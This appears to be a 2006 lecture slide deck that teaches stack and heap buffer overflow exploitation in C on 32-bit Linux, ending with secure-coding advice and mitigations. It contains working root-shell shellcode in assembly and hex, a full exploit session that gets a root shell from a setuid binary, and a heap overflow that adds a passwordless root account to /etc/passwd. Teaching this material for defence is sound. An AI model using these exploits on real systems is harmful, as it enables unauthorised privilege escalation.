Software Exploits
How the Black Hats do what they do—Stack Overflows
(or how a 1337 h4x0r can pwn your system)Kevin C. Smallwood
March 2006
What will we cover?
• What are buffer overflows?
• What is the problem?
• What is shellcode?
• How are functions called?
• How is a stack buffer overflow exploited?– One method
• Which programming methods should I follow?
What is a buffer overflow?
• Four types:– Stack overflows– Heap overflows– Integer overflows– Format string overflows
• Examples:– gets(buffer); Morris finger worm– strcpy(dest_little_buffer, src_big_input_buffer);
• Not necessarily a problem:– strcpy(internal_buffer1, internal_buffer2);
The problem on the stack
• The stack grows down from high memory to low memory– Black Hats look for buffer overflows to rewrite the
return address on the stack so that their code is executed instead of the normal program flow.
• Goal: Take over the processor’s instruction pointer
– When calling a function certain things are pushed onto the stack:
• Called function’s parameters in reverse order• Extended Instruction Pointer (eip) (return address)• Calling function’s ebp (stack frame pointer)• Called function’s local variables
– By overflowing space on the stack, return address can be changed to execute “shellcode” or cause a crash (Denial of Service (DoS))
Shellcode
• No, it is not shell scripting• It is code (payload) to spawn a shell—usually
with privileges (like “root”)– Remote exploit may just supply a toe-hold into system
• It may execute a program function to grant desired outcome– Gambling program where player always wins
• It may execute library function– execve()
Simple example program
#include <stdio.h>greeting(char *temp1, char *temp2){char name[400];strcpy(name, temp2);printf(“Hello %s %s\n”, temp1, name);
}main(int argc, char * argv[]){greeting(argv[1], argv[2]);printf(“Bye %s %s\n”, argv[1], argv[2]);
}
Typical execve() program stack4-byte null
Bottom of Stack0xBFFFFFFC:
Full pathname ofexecutable—null-terminated
env strings—null-terminatedTERM=vt100, etc.
argv strings—null-terminatedargv[0], argv[1], etc.
zero-filled padding0 to 8064 bytes
Starting address can easily be calculated:/bin/ls 8-bytes
112-bytes of ELF interpreterinformation
env pointersargv pointers
runtime data (from _start, etc.)
envpargvargc
Top of Stack
Parameters to main()Low
Memory
High Memory
How are functions called?
• Items are pushed on to the stack when functions are called.
• The stack frame pointer and instruction pointer are popped off the stack upon return.
Function Call
mov 0xc(%ebp),%eax
add $0x8,%eax
pushl (%eax)
mov 0xc(%ebp),%eax
add $0x4,%eax
pushl (%eax)
call 0x804835c
High Memory
temp2
Low Memory
temp1
Return Address (eip)
parameters to greeting()
greeting(char *temp1, char *temp2)
Return Address
Function Prolog
push %ebp
mov %esp,%ebp
sub $0x190,%esp
char name[400]; temp2
Low Memory
Return Address (eip)
•Calling function’s ebpebp
High Memory
espname[400]
temp1
Function Epilog
leave
ret
High Memory
temp2
Low Memory
Return Address (eip)
•Calling function’s ebp
ebpesp
name[400]
temp1
Even simpler code example:
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
m
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
m y
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
m y
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
m y i
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
m y id
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
m y id e
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
m y id e n
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
m y id e n t
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
m y id e n t
null
What happens to the stack?
int foo() {
char buf[9];
strcpy(buf, “my ident”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
6D 79 20 6964 65 6E 7400
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a s
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t h
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t s
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t st
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t st a
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t st a c
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t st a c k
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t st a c k
8E
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t st a c k
8E FF
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t st a c k
8E FF FF
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
s m a sh t ha t st a c k
8E FF FF BF
What happens to the stack?Black Hat Style
int foo() {
char buf[9];
strcpy(buf, “smash that stack\x8E\xFF\xFF\xBF”);
}
stuff
more stuff
Return Address
Saved Frame Pointer
73 6D 60 7368 20 74 6860 74 20 7374 60 63 6B8E FF FF BF
What is significant about the return address?
• Remember little endian– Address is really
0xBFFFFF8E
– This is up in the environment variable area
• What if the Black Hat set an env variable to shellcode? (export sc=`cat shellcode`)
– We would jump into that shellcode and start execution!
stuff
more stuff
Return Address
Saved Frame Pointer
73 6D 60 7368 20 74 6860 74 20 7374 60 63 6B8E FF FF BF
More about shellcode
• Most of the time, shellcode cannot include any zero bytes since that is a NULL– Will terminate strings in many programming
languages
• Our shellcode will just represent the binary machine code to spawn a shell– We are looking to exploit buffer overflow in
setuid root programs in order to get a root shell
Classic shell-spawning shellcode• Essentially:
void main() {
char *name[2];
setreuid(0, 0);
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
Classic shell-spawning shellcode
BITS 32
; setreuid(uid_t ruid, uid_t euid)xor eax, eax ; first eax must be 0 for the next instructionmov al, 70 ; put 70 into eax, since setreuid is syscall #70xor ebx, ebx ; put 0 into ebx, to set real uid to rootxor ecx, ecx ; put 0 into ecx, to set effective uid to rootint 0x80 ; Call the kernel to make the system call happen
; execve(const char *filename, char *const argv[], char *const envp[])push ecx ; push 4 bytes of null from ecx to the stackpush 0x68732f2f ; push “//sh” to the stackpush 0x6e69622f ; push “/bin” to the stackmov ebx, esp ; put the address of “/bin/sh” to ebx, via esppush ecx ; push 4 bytes of null from ecx to the stackpush ebx ; push ebx to the stackmov ecx, esp ; put the address of ebx to ecx, via espxor edx, edx ; put 0 into edxmov al, 11 ; put 11 into eax, since execve() is syscall #11int 0x80 ; call the kernel to make the syscall happen
Classic shell-spawning shellcode
export shellcode=`perl –e ‘print
“\x31\xC9\x31\xDB\x31\xC0\xB0\x46
\xCD\x80\x51\x68\x2F\x2F\x73\x68
\x68\x2F\x62\x69\x6E\x89\xE3\x51
\x53\x89\xE1\x31\xD2\xB0\x0B\xCD
\x80”’;`
33 bytes! Fairly small payload.
genv program
• Get the address of an environment variable
#include <stdio.h>
int main(int argc, char *argv[]) {char *addr;if(argc < 2) {
printf(“Usage:\n%s <environment variable name>\n”,
argv[0]);exit(0);
}addr = getenv(argv[1]);if(addr == NULL)
printf(“The environment variable %s doesn’texist.\n”, argv[1]);
elseprintf(“%s is located at %p\n”, argv[1],
addr);return 0;
}
Put the exploit together
$ ls –l vuln
-rwsr-xr-x 1 root root 6265 Nov 14 14:40 vuln
$ export shellcode=`perl –e ‘print “\x31\xC9\x31\xDB\x31\xC0\xB0\x46\xCD\x80\x51\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x51\x53\x89\xE1\x31\xD2\xB0\x0B\xCD\x80”;’`
$ ./genv shellcode
shellcode is located at 0xbffffd8e
$ ./vuln `perl –e ‘print “\x8e\xfd\xff\xbf”x5;’`
# whoami
root
#
What does the program stack look like?
• 0xBFFFFD8E points at our “shellcode” environment variable value (the code to spawn a shell).
stuff
more stuff
Return Address
Saved Frame Pointer
8E FD FF BF8E FD FF BF8E FD FF BF8E FD FF BF8E FD FF BF
Is this a problem in OSS?
• CVE-1999-0042: Buffer overflow in University of Washington’s implementation of IMAP and POP servers
• CVE-2000-0389–CVE-2000-0392: Various buffer overflows in Kerberos
• BugTraq ID 16141: Linux kernel sysctl_string local buffer overflow vulnerability
• BugTraq ID 16142: Linux kernel DVB driver local buffer overflow vulnerability
Methods of stopping stack buffer overflows
• Red Hat’s exec shield starts the bottom of the stack at a random location for each new task– Pro: Difficult to determine the address of
shellcode– Con: Mainline kernel doesn’t include exec
shield
• Non-executable stack– Pro: Stops most common exploits– Con: Execute library functions or shellcode
loaded elsewhere
Be a better software engineer!
• Understand how and when buffers can be overflowed
• Use code-reviews to look for unprotected copies of attacker-provided input into buffers– Replace dangerous string handling functions
• Sanitize input! NEVER trust user input!• Use analysis tools
– Coverity, PREfast, Klocwork
What did we cover?
What are buffer overflows?What is the problem?What is shellcode?How are functions called?How is a stack buffer overflow exploited?Which programming methods should I
follow?
For more information
• Gray Hat Hacking, Harris, et al., 2005• Hacking, The Art of Exploitation, Erickson,
2003• The Shellcoder’s Handbook, Koziol, et al.,
2004• Secure Coding in C and C++, Seacord,
2006• 19 Deadly Sins of Software Security,
Howard, et al., 2005
Questions?Feedback?
Part 2: Overflows in the Heap
• Currently a work in progress
Heap overflows
• Different attack method– Much harder to find!– Goal is still to control a privileged program– These exploits happen in the heap and bss memory
segments– Depend on important variables being stored in the
heap/bss segment• Adjacent variables (e.g., file names)• Permissions or authentication values• Function pointers
– Key: Never trust user input!
Heap overflow program #1Adjacent variable corruption
#include <stdio.h>#include <stdlib.h>int main(int argc, char *argv[]) {
FILE *fd;char *userinput = malloc(20);char *outputfile = malloc(20);if (argc < 2) {
printf(“Usage: %s <string to be written to /tmp/notes>\n”,argv[0]);
exit(0);}strcpy(outputfile, “/tmp/notes”);strcpy(userinput, argv[1]);fd = fopen(outputfile, “a”);if (fd == NULL) {
fprintf(stderr, “error opening %s\n”, outputfile);exit(1);
}fprintf(fd, “%s\n”, userinput);fclose(fd);return 0;
}
Heap overflow program #1Adjacent variable corruption
• Important things to note:– Order of the variable definitions and mallocs
• The heap grows to high memory
– Use of unbounded strcpy– The order of the strcpys
• In other words, many things have to be in place, however:– Never trust user provided input!
Heap overflow exploitAdjacent variable corruption
• Let’s overwrite the output file name– Instead of /tmp/notes, /etc/passwd!– 20 bytes malloced, but 24 bytes between
variables• Overflow the userinput variable 24 bytes and
then into the outputfile variable•userinput comes from command line (argv[1])
– Never trust user provided input!
Heap overflow exploit Adjacent variable corruption
• Since this program writes a string to a file, let’s write a string to /etc/passwd
• Can we overflow into outputfile the string “/etc/passwd”?– “myroot::0:0:m:/root:/tmp/etc/passwd”
• “myroot::0:0:m:/root:/tmp”—24 bytes• “/etc/passwd” overflows into the outputfile
myroot::0:0:m:/root:/tmp/etc/passwd
00000000011111111112222222222333333
12345678901234567890123456789012345
• How do we make “/tmp/etc/passwd” a shell?– mkdir /tmp/etc; ln –s /bin/sh /tmp/etc/passwd